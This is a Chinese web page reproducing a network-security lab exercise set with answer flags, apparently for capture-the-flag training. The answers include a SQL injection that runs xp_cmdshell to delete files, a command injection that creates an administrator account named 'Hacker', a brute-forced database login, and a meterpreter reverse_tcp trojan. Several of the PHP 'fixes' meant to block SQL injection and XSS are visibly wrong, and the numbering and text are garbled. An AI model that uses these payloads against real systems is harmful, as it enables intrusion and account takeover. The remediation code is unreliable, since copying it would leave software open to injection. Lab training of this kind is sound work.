好文档 - 专业文书写作范文服务资料分享网站

网络空间安全实训题及讲解

天下 分享 时间: 加入收藏 我要投稿 点赞

训测五-1-14通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交; appears

训测五-1-15通过通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒数第二个单词作为Flag提交; execution

训测五-1-16通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交; exploit

训测五2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号信息(用 netstat -an查询)F2作为flag值提交:格式为:F1|F2

SQL2KSP4|TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING

训测五2-2在bt5上使用hydra暴力破解sql-server数据库(mssql),并将其爆破结果中正确结果login:结果和password:结果作为flag值提交;格式为f1&f2 sa&1234

训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。

exec master.dbo.xp_cmdshell ‘md c:\\njcx’

训测五-2-4在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景www.test.com流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。 299

信息安全管理与评估补充题

1. 配置靶机WebServ2003的DHCP功能,能够分配IP的范围为

172.19.X.X(111~150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:F1-F2; DHCP OFFER DHCP ACK

2. 使用渗透机攻击WebServ2003,进行DHCP地址池耗尽攻击,把使用中的IP地址数比例作为Flag提交; 100%

3.进入loginAuth.php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1|F2|F3;

Mssql_select_db Password $password

4. 再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。 Username Does Not Exist

5.Web继续访问WebServ2003服务器,\,分析该页面源程序,找到提交的变量名,并作为Flag提交。

usernm

5. Web继续访问WebServ2003服务器,\,分析该页面源程序,将表单提交方式作为Flag提交。 get

6. Web继续访问WebServ2003服务器,\,分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。 list.html

7. 对\页面注入点进行渗透测试,根据输入“%”以及“_”

的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交; Email:ww@yahoo.com.cn

9.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:\\目录下的1.txt文档,并将注入代码作为Flag提交。 ‘exec master.dbo.xp_cmdshell ‘del c:\\1.txt’—

10. 进入WebServ2003服务器的C:\\AppServ\\www目录,找到QueryCtrl.php程序,分析并修改PHP源程序,将‘%’替换为‘\\%’,‘_’替换为‘\\_’使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。格式为F1-F2-F3? $keyWord=addslashes($KeyWord);

$keyWord=str_replace(“%”,”\\”,$KeyWord); $keyWord=str_replace(“%_”,”\\_”,$KeyWord);

11. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。将系统出现的错误提示作为Flag提交。 Bad KeyWord!

12. 进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交。格式为Y1-Y2-Y3-Y4...

13. 进入\ployee Message Board\页面,再次对页面注入

点进行渗透测试,调用存储过程删除WebServ2003服务器的C:\\目录下的1.txt文档,将页面提示第一个字符串作为Flag提交; Warning

14. 进入\页面进行XSS渗透测试,循环弹框\根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交。

15. 通过IIS搭建网站(http://hacker.org/),并通过渗透机生成木马程序TrojanHorse.exe,将使用的工具和模块路径作为Flag提交。格式为{F1&F2} msfpayload

Windows/meterpreter/reverse_tcp

16. 对该任务题目1页面注入点进行渗透测试,使\

Board\页面的访问者执行网站(http://hacker.org/)中的木马程序:http://hacker.org/TrojanHorse.exe,并将注入代码作为Flag提交。

17. 进入WebServ2003服务器的C:\\AppServ\\www目录,找到insert.php程序,分析并修改PHP源程序,使用‘{’替‘<’、‘}’替换‘>’,使之可以抵御XSS渗透测试,并将需要使用的函数和增加语句作为Flag提交。格式为[F1/F2] Str_replace

$info=str_replace(“<”,”{”,$info); $info=str_replace(“>”,”}”,$info);

18. 再次执行第16题注入渗透攻击,进入后台数据库中存储内容作为Flag提交。

19.Web访问DCST中的WebServ2003服务器,\Shopping Hall\,分析该页面源程序,找到最后一次提交的变量名和值作为Flag提交。

Goods=dvdrom&quantity=1

19. 对该任务题目19页面注入点进行渗透测试,使\Board\页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=10000,查看\页面,并将注入代码作为Flag提交。

20. 进入WebServ2003服务器的C:\\AppServ\\www目录,找到DisplayMessage.php程序,分析并修改PHP源程序,使之可以抵御CSRF渗透测试,将需要用到的函数作为Flag提交。 Strip_tags

21. Web访问ebServ2003服务器,\,分析该页面源程序,找到提交的变量名作为Flag。 directory

22. 对题目22页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:\\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码作为Flag提交。 WINDOWS|net user Hacker P@ssword /add

WINDOWS|net localgroup administrators Hacker /add

24.对该任务题目22页面注入点进行第23题渗透测试,使页面DisplayDirectoryCtrl.php回显内容最后一行作为Flag提交。 Display C:’Directory

网络空间安全实训题及讲解

训测五-1-14通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;appears训测五-1-15通过通过PC中渗透测试平台对服务器场
推荐度:
点击下载文档文档为doc格式
5859y6xgnj7yqpo85se79mzf00wron00iv3
领取福利

微信扫码领取福利

微信扫码分享